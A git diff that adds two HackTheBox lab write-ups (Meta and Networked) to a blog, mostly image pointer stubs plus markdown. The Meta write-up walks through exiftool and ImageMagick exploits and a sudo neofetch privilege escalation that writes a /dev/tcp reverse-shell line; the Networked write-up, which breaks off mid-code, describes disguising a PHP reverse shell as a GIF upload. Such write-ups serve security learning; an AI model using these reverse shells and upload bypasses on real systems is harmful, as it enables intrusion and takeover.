34361 diff --git a/content/writeup-ctf/writeup-meta-htb/img/image-1.webp b/content/writeup-ctf/writeup-meta-htb/img/image-1.webp new file mode 100644 index 0000000..fca9deb --- /dev/null +++ b/content/writeup-ctf/writeup-meta-htb/img/image-1.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:853ef003a811f2876b9c617786e32d66321b9421968b4b0ad84afef84d28ea8e +size 30872 diff --git a/content/writeup-ctf/writeup-meta-htb/img/image-10.png b/content/writeup-ctf/writeup-meta-htb/img/image-10.png new file mode 100644 index 0000000..19611b7 --- /dev/null +++ b/content/writeup-ctf/writeup-meta-htb/img/image-10.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fcad2520cf7701c87fb90128edd4eaf113223d4d05af145529a1a0da1ac4e590 +size 16811 diff --git a/content/writeup-ctf/writeup-meta-htb/img/image-10.webp b/content/writeup-ctf/writeup-meta-htb/img/image-10.webp new file mode 100644 index 0000000..164910b --- /dev/null +++ b/content/writeup-ctf/writeup-meta-htb/img/image-10.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:783ed4fc9ecc737bde285df0a148d0d079b63946b5f2d2a81f896e712e61757e +size 21830 diff --git a/content/writeup-ctf/writeup-meta-htb/img/image-11.png b/content/writeup-ctf/writeup-meta-htb/img/image-11.png new file mode 100644 index 0000000..64b49b2 --- /dev/null +++ b/content/writeup-ctf/writeup-meta-htb/img/image-11.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:705f86e611afda24e6edf49fb3da1cc21c397f01cab01a0f6d8e420a98c7c644 +size 46894 diff --git a/content/writeup-ctf/writeup-meta-htb/img/image-11.webp b/content/writeup-ctf/writeup-meta-htb/img/image-11.webp new file mode 100644 index 0000000..bd51874 --- /dev/null +++ b/content/writeup-ctf/writeup-meta-htb/img/image-11.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6707d853dc7c153fac5707f0ab21f18576648cd44181e81e318b02a1c8d4c55b +size 50798 diff --git a/content/writeup-ctf/writeup-meta-htb/img/image-12.png b/content/writeup-ctf/writeup-meta-htb/img/image-12.png new file mode 100644 index 0000000..96ace65 --- /dev/null +++ b/content/writeup-ctf/writeup-meta-htb/img/image-12.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:86b1a5da73f2997b4e3c8096bc1c5dd8a64cda3b11d8db942e39caa07ef87b8d +size 17079 diff --git a/content/writeup-ctf/writeup-meta-htb/img/image-12.webp b/content/writeup-ctf/writeup-meta-htb/img/image-12.webp new file mode 100644 index 0000000..b581b34 --- /dev/null +++ b/content/writeup-ctf/writeup-meta-htb/img/image-12.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:71ac0c4b822e72f5d4565ad40fd869c461aa8adb6dab99f36109337f3a698bce +size 16432 diff --git a/content/writeup-ctf/writeup-meta-htb/img/image-13.png b/content/writeup-ctf/writeup-meta-htb/img/image-13.png new file mode 100644 index 0000000..54b2cef --- /dev/null +++ b/content/writeup-ctf/writeup-meta-htb/img/image-13.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fd3f8a6b78074a7773eb4a39ab6fc755b0a1f2ad87e46f34312983c540ad456a +size 17702 diff --git a/content/writeup-ctf/writeup-meta-htb/img/image-13.webp b/content/writeup-ctf/writeup-meta-htb/img/image-13.webp new file mode 100644 index 0000000..bf1f3fb --- /dev/null +++ b/content/writeup-ctf/writeup-meta-htb/img/image-13.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2a9d91af638f535f4a8ab5aa73669eb257b73b01f87d36e3ce10b94c83b18db4 +size 18794 diff --git a/content/writeup-ctf/writeup-meta-htb/img/image-2.png b/content/writeup-ctf/writeup-meta-htb/img/image-2.png new file mode 100644 index 0000000..b9aee5b --- /dev/null +++ b/content/writeup-ctf/writeup-meta-htb/img/image-2.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b623aedcb82404216cce2e83666511da3160eef05e8128cd9cabc42b6d37200c +size 426544 diff --git a/content/writeup-ctf/writeup-meta-htb/img/image-2.webp b/content/writeup-ctf/writeup-meta-htb/img/image-2.webp new file mode 100644 index 0000000..075f3a6 --- /dev/null +++ b/content/writeup-ctf/writeup-meta-htb/img/image-2.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:aab7ba3a46c9729e0926da84663aba1cbb3f75a00c54d1c1fbaae48f1fb8771d +size 62666 diff --git a/content/writeup-ctf/writeup-meta-htb/img/image-3.png b/content/writeup-ctf/writeup-meta-htb/img/image-3.png new file mode 100644 index 0000000..53e5c94 --- /dev/null +++ b/content/writeup-ctf/writeup-meta-htb/img/image-3.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5615e9cb916408f940b04b704342441c9cb0220e835205b8f3c65d55026ee18e +size 59451 diff --git a/content/writeup-ctf/writeup-meta-htb/img/image-3.webp b/content/writeup-ctf/writeup-meta-htb/img/image-3.webp new file mode 100644 index 0000000..a233aa4 --- /dev/null +++ b/content/writeup-ctf/writeup-meta-htb/img/image-3.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e7d86013fd1e3395af6eccc367c1d70528930db41846e188a84975b954e18aa8 +size 48820 diff --git a/content/writeup-ctf/writeup-meta-htb/img/image-4.png b/content/writeup-ctf/writeup-meta-htb/img/image-4.png new file mode 100644 index 0000000..3331bca --- /dev/null +++ b/content/writeup-ctf/writeup-meta-htb/img/image-4.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6d11fcec8942c33e8a5b8ae8c50009c00c14e92a7e35838c316f071fdd1eb4e8 +size 45576 diff --git a/content/writeup-ctf/writeup-meta-htb/img/image-4.webp b/content/writeup-ctf/writeup-meta-htb/img/image-4.webp new file mode 100644 index 0000000..cb09238 --- /dev/null +++ b/content/writeup-ctf/writeup-meta-htb/img/image-4.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2269965ced9ff05d0ae6dc5c19698def5731f750f31021a09a88bb0c8e90cc19 +size 41664 diff --git a/content/writeup-ctf/writeup-meta-htb/img/image-5.png b/content/writeup-ctf/writeup-meta-htb/img/image-5.png new file mode 100644 index 0000000..c8a56ac --- /dev/null +++ b/content/writeup-ctf/writeup-meta-htb/img/image-5.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d775632d712642a82e51af075dccae2ba560077bcfb398dd818ed63bcc987baa +size 13111 diff --git a/content/writeup-ctf/writeup-meta-htb/img/image-5.webp b/content/writeup-ctf/writeup-meta-htb/img/image-5.webp new file mode 100644 index 0000000..374da45 --- /dev/null +++ b/content/writeup-ctf/writeup-meta-htb/img/image-5.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5beacab68bc524723e60a73148fcbcd7db35ad50107351ff9a0ef2d577a74432 +size 10042 diff --git a/content/writeup-ctf/writeup-meta-htb/img/image-6.png b/content/writeup-ctf/writeup-meta-htb/img/image-6.png new file mode 100644 index 0000000..532949d --- /dev/null +++ b/content/writeup-ctf/writeup-meta-htb/img/image-6.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e2a56052b6bc7580a6452888fcbfbfabceebf4dce90482be765b1450a3daffc2 +size 12623 diff --git a/content/writeup-ctf/writeup-meta-htb/img/image-6.webp b/content/writeup-ctf/writeup-meta-htb/img/image-6.webp new file mode 100644 index 0000000..22dab5e --- /dev/null +++ b/content/writeup-ctf/writeup-meta-htb/img/image-6.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c42d578f4c3dacae10bb1184e35b6879fca2b63b59edf8664819f54277b86b35 +size 6198 diff --git a/content/writeup-ctf/writeup-meta-htb/img/image-7.png b/content/writeup-ctf/writeup-meta-htb/img/image-7.png new file mode 100644 index 0000000..c383595 --- /dev/null +++ b/content/writeup-ctf/writeup-meta-htb/img/image-7.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3022af18d3cd2b16ff1a9dd18952e9a6006777aa56eca1d62e70a266bb2b9ed4 +size 39980 diff --git a/content/writeup-ctf/writeup-meta-htb/img/image-7.webp b/content/writeup-ctf/writeup-meta-htb/img/image-7.webp new file mode 100644 index 0000000..dfdacd5 --- /dev/null +++ b/content/writeup-ctf/writeup-meta-htb/img/image-7.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9fa7725ee1232e07d7ff01d311cb3ae9e0f91641490a218b702fa3333ce5190f +size 21094 diff --git a/content/writeup-ctf/writeup-meta-htb/img/image-8.png b/content/writeup-ctf/writeup-meta-htb/img/image-8.png new file mode 100644 index 0000000..df3d535 --- /dev/null +++ b/content/writeup-ctf/writeup-meta-htb/img/image-8.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4d9fbb1ed77c5ed6c273f00d51cf1b4160783117bda2f965e23b70f84d422b89 +size 61515 diff --git a/content/writeup-ctf/writeup-meta-htb/img/image-8.webp b/content/writeup-ctf/writeup-meta-htb/img/image-8.webp new file mode 100644 index 0000000..9d0537d --- /dev/null +++ b/content/writeup-ctf/writeup-meta-htb/img/image-8.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8db35e3f99601f628450db664ec996186162a3370b1e2670a3aaf6dd7ecc1222 +size 53324 diff --git a/content/writeup-ctf/writeup-meta-htb/img/image-9.png b/content/writeup-ctf/writeup-meta-htb/img/image-9.png new file mode 100644 index 0000000..da3d308 --- /dev/null +++ b/content/writeup-ctf/writeup-meta-htb/img/image-9.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a64857ed6a921ae8e02c7283a17bc0ea56698e2cfe8d0299ebf5aa594e93f5c6 +size 13912 diff --git a/content/writeup-ctf/writeup-meta-htb/img/image-9.webp b/content/writeup-ctf/writeup-meta-htb/img/image-9.webp new file mode 100644 index 0000000..db5a4b8 --- /dev/null +++ b/content/writeup-ctf/writeup-meta-htb/img/image-9.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:62a8120a76a71d8537ebcb7b1bf2d6202147e44312c3b98e88787e3da95a620d +size 13348 diff --git a/content/writeup-ctf/writeup-meta-htb/index.md b/content/writeup-ctf/writeup-meta-htb/index.md new file mode 100644 index 0000000..a181034 --- /dev/null +++ b/content/writeup-ctf/writeup-meta-htb/index.md @@ -0,0 +1,153 @@ +--- +title: "Writeup - Meta (HTB)" +date: 2022-04-03 +slug: "writeup-meta-htb" +type: "writeup-ctf" +--- + +This is a writeup for the [Meta](https://app.hackthebox.com/machines/Meta) machine from the HackTheBox site. + +## Enumeration + +First, let's start with a scan of our target with the following command: + + +```bash +nmap -sV -T4 -Pn 10.129.119.94 +``` +Two TCP ports are discovered: + +![](img/image-1.webp) + +- 22/tcp : SSH port (OpenSSH 7.9p1) +- 80/tcp : HTTP web server (Apache httpd) + +![](img/image-2.webp) + +## Exploit + +At first I order by listing the different pages of the site. + +![](img/image-3.webp) + +Nothing in particular, I continue by making an enumeration of the subdomains. + +![](img/image-4.webp) + +Ok, there is a subdomain, I add it to the `/etc/hosts` file, then I access it via a browser. + +![](img/image-5.webp) + +It is a page that redirects us to another page that contains a form to upload a file. + +![](img/image-6.webp) + +So I try to upload an image to see what the page tells me: + +![](img/image-7.webp) + +The result reminds me strongly of a crypto tool I already used: `exiftool`. + +![](img/image-8.webp) + +So I know that on the server side, this tool is used, it's a good information ! So I look if there are exploits with this service. Quickly I find this flaw : CVE-2021-22204. It is an exploit that allows via meta data in an image the execution of instructions. So we can create a reverse shell ! With a little more research I find this [github](https://github.com/convisolabs/CVE-2021-22204-exiftool). + +It is a tool for image modification and reverse shell insertion. + + +```bash +┌──(d3vyce㉿kali)-[~] +└─$ python3 exploit.py + 1 image files updated +``` +Once the image is modified, I upload it and it creates the reverse shell: + +![](img/image-9.webp) + +I look for the location of the flag with the following command: + + +```bash +find / -name user.txt 2>/dev/null +``` +I find that the flag is in `thomas` personal file, but I don't have the rights to read it... + +So I am looking for a way to change the user. In the site folder, I find a folder `convert_image`... It is said to be an input folder for a script or a service that would convert images. I am looking for other elements with the same name on the system: + + +```bash +www-data@meta:/var/www/dev01.artcorp.htb/convert_images$ find / -name convert_image* 2>/dev/null +/dev/null +/usr/local/bin/convert_images.sh +/var/www/dev01.artcorp.htb/convert_images +``` +There is a script with the same name! Looking at the content, I can see that it uses the `[mogrify](https://linux.die.net/man/1/mogrify)` service to perform the conversion of the images in the folder. + + +```bash +#!/bin/bash +cd /var/www/dev01.artcorp.htb/convert_images/ && /usr/local/bin/mogrify -format png *.* 2>/dev/null +pkill mogrify +``` +I look for the version of the service with the following command: + +![](img/image-10.webp) + +Then I look if there are some feats. After some research I find this [exploit](https://insert-script.blogspot.com/2020/11/imagemagick-shell-injection-via-pdf.html). It allows to do a shell injection in an SVG image. + +So I use the template provided in the article, then I modify it to get the content of the `id_rsa` file of the user `thomas`. + + +```bash + + + + + + + + + +``` +Then I copy the file to the `convert_images` folder. After a few seconds I find the newly created file in the `/dev/shm`. + +Now that I have this file, I add the privileges and create an SSH session: + +![](img/image-11.webp) + +I now have a shell as `thomas` and I get the first flag. + +## Privilege escalation + +I start by checking the sudo permissions of my user. I notice 2 things: + +- I have the right to use the command `/usr/bin/neofetch \"\"` as root +- The environment variable `XDG_CONFIG_HOME` is kept when running sudo + +![](img/image-12.webp) + +After some research, I find that `neofetch` has a file in configuration in the folder `~/.config/neofetch/`. So I start by putting a reverse shell in this config file. + + +```bash +thomas@meta:~/.config/neofetch$ cd .config/neofetch/ +thomas@meta:~/.config/neofetch$ echo "/bin/sh -i >& /dev/tcp/10.10.14.40/2345 0>&1" > config.conf +``` +Then I set the variable `XDG_CONFIG_HOME` with the `.local` of my user. Then I run `neofetch` as sudo. + + +```bash +thomas@meta:~/.config/neofetch$ export XDG_CONFIG_HOME="$HOME/.config" +thomas@meta:~/.config/neofetch$ sudo -u root /usr/bin/neofetch \"\" +``` +I now have a reverse shell `root` and I can get the last flag. + +![](img/image-13.webp) + +## Recommendations + +To patch this host I think it would be necessary to perform a number of actions: + +- Update `exiftool` to avoid CVE-2021-22204 +- Update `mogrify` to avoid shell injection exploit +- Disable the option to keep the`XDG_CONFIG_HOME` variable at runtime with sudo diff --git a/content/writeup-ctf/writeup-networked-htb/featured.png b/content/writeup-ctf/writeup-networked-htb/featured.png new file mode 100644 index 0000000..91b852d --- /dev/null +++ b/content/writeup-ctf/writeup-networked-htb/featured.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4c47b86db44402af1e96309d05c74412804b6ec2e4005e11981045edb56c8bb1 +size 381351 diff --git a/content/writeup-ctf/writeup-networked-htb/featured.webp b/content/writeup-ctf/writeup-networked-htb/featured.webp new file mode 100644 index 0000000..76f295b --- /dev/null +++ b/content/writeup-ctf/writeup-networked-htb/featured.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4ba506bb571577254cbf0673f3c4cf22dab0c62a179fbe5d207aa51191392d49 +size 37858 diff --git a/content/writeup-ctf/writeup-networked-htb/img/image-1.png b/content/writeup-ctf/writeup-networked-htb/img/image-1.png new file mode 100644 index 0000000..0d2cd35 --- /dev/null +++ b/content/writeup-ctf/writeup-networked-htb/img/image-1.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7aad33039dfc3dc6ddb53e26b4282aecc1172caa3cbbe69385db52ffa5dcf0af +size 36387 diff --git a/content/writeup-ctf/writeup-networked-htb/img/image-1.webp b/content/writeup-ctf/writeup-networked-htb/img/image-1.webp new file mode 100644 index 0000000..9b22e14 --- /dev/null +++ b/content/writeup-ctf/writeup-networked-htb/img/image-1.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:baf1f6e8811bcf5ff967bfae5c81bb4b952705f734b4436e21bbcc5033241a62 +size 37430 diff --git a/content/writeup-ctf/writeup-networked-htb/img/image-10.png b/content/writeup-ctf/writeup-networked-htb/img/image-10.png new file mode 100644 index 0000000..f7a29f3 --- /dev/null +++ b/content/writeup-ctf/writeup-networked-htb/img/image-10.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d6291300663d1252430bf610273f951c0b05769d4248d82fc3263018c4bdbe2e +size 33221 diff --git a/content/writeup-ctf/writeup-networked-htb/img/image-10.webp b/content/writeup-ctf/writeup-networked-htb/img/image-10.webp new file mode 100644 index 0000000..2ec401d --- /dev/null +++ b/content/writeup-ctf/writeup-networked-htb/img/image-10.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:42a0bb9589e6e095560a91c515ca3a93201b8aff90d00eda42b87f51b8b148dd +size 30636 diff --git a/content/writeup-ctf/writeup-networked-htb/img/image-11.png b/content/writeup-ctf/writeup-networked-htb/img/image-11.png new file mode 100644 index 0000000..552e78c --- /dev/null +++ b/content/writeup-ctf/writeup-networked-htb/img/image-11.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:27180d60c4ce86c58a410a41f9e2c17d2caba4494cede04bd81fe4106ee3511e +size 17951 diff --git a/content/writeup-ctf/writeup-networked-htb/img/image-11.webp b/content/writeup-ctf/writeup-networked-htb/img/image-11.webp new file mode 100644 index 0000000..5dfe865 --- /dev/null +++ b/content/writeup-ctf/writeup-networked-htb/img/image-11.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a7f9b57d088c8f83d5944029681e564c4e95f4f07ae39526fb479457f1952455 +size 29134 diff --git a/content/writeup-ctf/writeup-networked-htb/img/image-12.png b/content/writeup-ctf/writeup-networked-htb/img/image-12.png new file mode 100644 index 0000000..84ed5c8 --- /dev/null +++ b/content/writeup-ctf/writeup-networked-htb/img/image-12.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f7307cc8697dd70644fd5dc78f033aee0f5dd7b47d26030c41ac15334280d268 +size 16308 diff --git a/content/writeup-ctf/writeup-networked-htb/img/image-12.webp b/content/writeup-ctf/writeup-networked-htb/img/image-12.webp new file mode 100644 index 0000000..dbd08f6 --- /dev/null +++ b/content/writeup-ctf/writeup-networked-htb/img/image-12.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:308492e1879bcc4e99a02142c67ae081146eb02b5dfec2a8582da02a04c5bd14 +size 15396 diff --git a/content/writeup-ctf/writeup-networked-htb/img/image-13.png b/content/writeup-ctf/writeup-networked-htb/img/image-13.png new file mode 100644 index 0000000..fe8b2d4 --- /dev/null +++ b/content/writeup-ctf/writeup-networked-htb/img/image-13.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8b48cad07953532e26b027bc64b8219959b278801db72ba3c867532cca6fe9b4 +size 23816 diff --git a/content/writeup-ctf/writeup-networked-htb/img/image-13.webp b/content/writeup-ctf/writeup-networked-htb/img/image-13.webp new file mode 100644 index 0000000..09eeacb --- /dev/null +++ b/content/writeup-ctf/writeup-networked-htb/img/image-13.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8c41de94140b934b21ea165ee1f57972e7992544efb178ccaff49f3f8b4b482d +size 36862 diff --git a/content/writeup-ctf/writeup-networked-htb/img/image-14.png b/content/writeup-ctf/writeup-networked-htb/img/image-14.png new file mode 100644 index 0000000..06ca7fb --- /dev/null +++ b/content/writeup-ctf/writeup-networked-htb/img/image-14.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8c02571f6a24a3534f5421bc0b82644ef405133671d5921ce01a5343f0a7e9f5 +size 18539 diff --git a/content/writeup-ctf/writeup-networked-htb/img/image-14.webp b/content/writeup-ctf/writeup-networked-htb/img/image-14.webp new file mode 100644 index 0000000..4654601 --- /dev/null +++ b/content/writeup-ctf/writeup-networked-htb/img/image-14.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:893ca0e01605f356797e789d696a274a25128ebe702e48d092498abb45c75324 +size 18794 diff --git a/content/writeup-ctf/writeup-networked-htb/img/image-2.png b/content/writeup-ctf/writeup-networked-htb/img/image-2.png new file mode 100644 index 0000000..e789b2e --- /dev/null +++ b/content/writeup-ctf/writeup-networked-htb/img/image-2.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1a52652cbdb94366f0484677a906656a81f52c9d4915c2f711709d1ced301a53 +size 13489 diff --git a/content/writeup-ctf/writeup-networked-htb/img/image-2.webp b/content/writeup-ctf/writeup-networked-htb/img/image-2.webp new file mode 100644 index 0000000..0d4515f --- /dev/null +++ b/content/writeup-ctf/writeup-networked-htb/img/image-2.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5df2eebc7232e32393886374cc7a126d15197afdeafb7017762e229f8886548a +size 9950 diff --git a/content/writeup-ctf/writeup-networked-htb/img/image-3.png b/content/writeup-ctf/writeup-networked-htb/img/image-3.png new file mode 100644 index 0000000..cfeaa29 --- /dev/null +++ b/content/writeup-ctf/writeup-networked-htb/img/image-3.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:062ccfa834fb7fb1ae151d6c3c9dbc9c7b50457ee9789887200fb02adf2bf176 +size 107000 diff --git a/content/writeup-ctf/writeup-networked-htb/img/image-3.webp b/content/writeup-ctf/writeup-networked-htb/img/image-3.webp new file mode 100644 index 0000000..fa5bc9f --- /dev/null +++ b/content/writeup-ctf/writeup-networked-htb/img/image-3.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ea79ab201396f627e2dffdaa075c40e17cbae87cc46402533854265b96cd7d7e +size 105768 diff --git a/content/writeup-ctf/writeup-networked-htb/img/image-4.png b/content/writeup-ctf/writeup-networked-htb/img/image-4.png new file mode 100644 index 0000000..44abaf2 --- /dev/null +++ b/content/writeup-ctf/writeup-networked-htb/img/image-4.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1a8cd3f972a1f690c96e232f9ca7cc65f944416e3c945c4d0c10680f7933c055 +size 16152 diff --git a/content/writeup-ctf/writeup-networked-htb/img/image-4.webp b/content/writeup-ctf/writeup-networked-htb/img/image-4.webp new file mode 100644 index 0000000..dc73d7f --- /dev/null +++ b/content/writeup-ctf/writeup-networked-htb/img/image-4.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b8ae627cf32e2bf5e752f54e68a67705ef1a52481352a526490264a54dfd3779 +size 13876 diff --git a/content/writeup-ctf/writeup-networked-htb/img/image-5.png b/content/writeup-ctf/writeup-networked-htb/img/image-5.png new file mode 100644 index 0000000..a497679 --- /dev/null +++ b/content/writeup-ctf/writeup-networked-htb/img/image-5.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:aef4f75daca24d531ddc55bd1f55407e5e1a93e2c9c512ac561f99add6a1246e +size 13831 diff --git a/content/writeup-ctf/writeup-networked-htb/img/image-5.webp b/content/writeup-ctf/writeup-networked-htb/img/image-5.webp new file mode 100644 index 0000000..8b1bd79 --- /dev/null +++ b/content/writeup-ctf/writeup-networked-htb/img/image-5.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f0ceea671b0d077498469e8c0a474707d42b44ce1cc57a96f54c75207d3b4d97 +size 19540 diff --git a/content/writeup-ctf/writeup-networked-htb/img/image-6.png b/content/writeup-ctf/writeup-networked-htb/img/image-6.png new file mode 100644 index 0000000..eccc0fc --- /dev/null +++ b/content/writeup-ctf/writeup-networked-htb/img/image-6.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f448a13b7634ed59a703671e65eb7d98cc74332e6bd8e0e42ccbcd7fe213f54b +size 17816 diff --git a/content/writeup-ctf/writeup-networked-htb/img/image-6.webp b/content/writeup-ctf/writeup-networked-htb/img/image-6.webp new file mode 100644 index 0000000..3fc563a --- /dev/null +++ b/content/writeup-ctf/writeup-networked-htb/img/image-6.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:48528e433857ea0c78c2a7d9d714e805285e3cd367af34435bd2c42e23e1e7cd +size 18184 diff --git a/content/writeup-ctf/writeup-networked-htb/img/image-7.png b/content/writeup-ctf/writeup-networked-htb/img/image-7.png new file mode 100644 index 0000000..901819d --- /dev/null +++ b/content/writeup-ctf/writeup-networked-htb/img/image-7.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3538620e15395cc0acf6aa0063e0bb4c707f40a3aff0938d865694fd81f431af +size 2578 diff --git a/content/writeup-ctf/writeup-networked-htb/img/image-7.webp b/content/writeup-ctf/writeup-networked-htb/img/image-7.webp new file mode 100644 index 0000000..6d9ef19 --- /dev/null +++ b/content/writeup-ctf/writeup-networked-htb/img/image-7.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:718ce11fa8ec1af61da4fb486fc17fcd7e78c18ddebdeb0d516a9f08818169f5 +size 1886 diff --git a/content/writeup-ctf/writeup-networked-htb/img/image-8.png b/content/writeup-ctf/writeup-networked-htb/img/image-8.png new file mode 100644 index 0000000..97247f7 --- /dev/null +++ b/content/writeup-ctf/writeup-networked-htb/img/image-8.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b1e374b71b43e37b4ce065233527f10731470aafcb5ef58838c389fac8bd7362 +size 6837 diff --git a/content/writeup-ctf/writeup-networked-htb/img/image-8.webp b/content/writeup-ctf/writeup-networked-htb/img/image-8.webp new file mode 100644 index 0000000..1c30ba5 --- /dev/null +++ b/content/writeup-ctf/writeup-networked-htb/img/image-8.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4d92aa6a1b5518fa54c4381dd5caa94646cb28eb1a63fe44eda096ff748ec314 +size 5492 diff --git a/content/writeup-ctf/writeup-networked-htb/img/image-9.png b/content/writeup-ctf/writeup-networked-htb/img/image-9.png new file mode 100644 index 0000000..d8e2578 --- /dev/null +++ b/content/writeup-ctf/writeup-networked-htb/img/image-9.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4d9fe6d798e2f43d38c34abedd2dbd709518f3c06f4ed2369b72ba778e1b7082 +size 8094 diff --git a/content/writeup-ctf/writeup-networked-htb/img/image-9.webp b/content/writeup-ctf/writeup-networked-htb/img/image-9.webp new file mode 100644 index 0000000..f2ac39d --- /dev/null +++ b/content/writeup-ctf/writeup-networked-htb/img/image-9.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0b78e1395da033681c0764ab8936b4bf1ca948b8c9e5191650457b8ec16a96b1 +size 7388 diff --git a/content/writeup-ctf/writeup-networked-htb/index.md b/content/writeup-ctf/writeup-networked-htb/index.md new file mode 100644 index 0000000..84374f2 --- /dev/null +++ b/content/writeup-ctf/writeup-networked-htb/index.md @@ -0,0 +1,194 @@ +--- +title: "Writeup - Networked (HTB)" +date: 2022-05-27 +slug: "writeup-networked-htb" +type: "writeup-ctf" +--- + +This is a writeup for the [Networked](https://app.hackthebox.com/machines/Networked) machine from the HackTheBox site. + +## Enumeration + +First, let's start with a scan of our target with the following command: + + +```bash +nmap -sV -T4 -Pn 10.10.11.146 +``` +Two TCP ports are discovered: + +![](img/image-1.webp) + +- 22/tcp : SSH port (OpenSSH 7.4) +- 80/tcp : HTTP web server (Apache 2.4.6) + +![](img/image-2.webp) + +## Exploit + +First, I start by scanning the pages of the website. + +![](img/image-3.webp) + +I find several pages interesting and especially `backup` in which you can find an archive. + +![](img/image-4.webp) + +I download the archive, unzip it and find the following files inside: + +![](img/image-5.webp) + +The different files correspond to pages of the site: + +![](img/image-6.webp) + +![](img/image-7.webp) + +So we have the possibility to upload images on the `upload.php` page and then to view them on the `photos.php` page. + +By analyzing the source code of the `upload.php` page I find that there are checks on the upload files. + + +```php +[...] +list ($foo,$ext) = getnameUpload($myFile["name"]); + $validext = array('.jpg', '.png', '.gif', '.jpeg'); + $valid = false; + foreach ($validext as $vext) { + if (substr_compare($myFile["name"], $vext, -strlen($vext)) === 0) { + $valid = true; + } + } +[...] +``` +So I'm not just going to be able to send a PHP reverse shell with the `.png` extension because the site checks the file signature to verify its type. The signature of a file is a set of magic byte at the beginning of a file. By looking in the following list I find the signature of the GIF files: [files signatures](https://en.wikipedia.org/wiki/List_of_file_signatures). + +Before adding the signature, my file is simply a Unicode text: + +![](img/image-8.webp) + +After adding the GIF signature, we can see that the file is now identified as a GIF image data. + +![](img/image-9.webp) + +In addition to this signature I will have to change the extensions so that the file passes the security, but also that it is executed as PHP by the server: + + +```bash +mv reverse.jpg reverse.php.gif +``` +I can now upload it and go view it to execute the code and run the reverse shell. + +![](img/image-10.webp) + +I now have a reverse shell as `apache`. But I don't have the access to see the first flag. In the user's home folder, I notice 2 interesting files: + +![](img/image-11.webp) + +The first one is a CRON file that executes the `check_attack.php` script every 3 minutes. + + +```bash +*/3 * * * * php /home/guly/check_attack.php +``` +The second one is the script that allows you to delete suspicious files from the `/var/www/html/uploads` : + + +```php + $value) { + 